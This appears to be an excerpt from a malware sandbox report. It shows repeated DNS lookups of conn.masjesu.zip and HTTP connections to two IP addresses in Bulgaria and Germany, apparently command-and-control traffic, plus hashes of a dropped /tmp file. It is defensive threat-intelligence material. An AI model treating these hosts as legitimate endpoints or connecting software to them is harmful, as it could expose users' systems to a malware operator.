US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp

Files

/tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97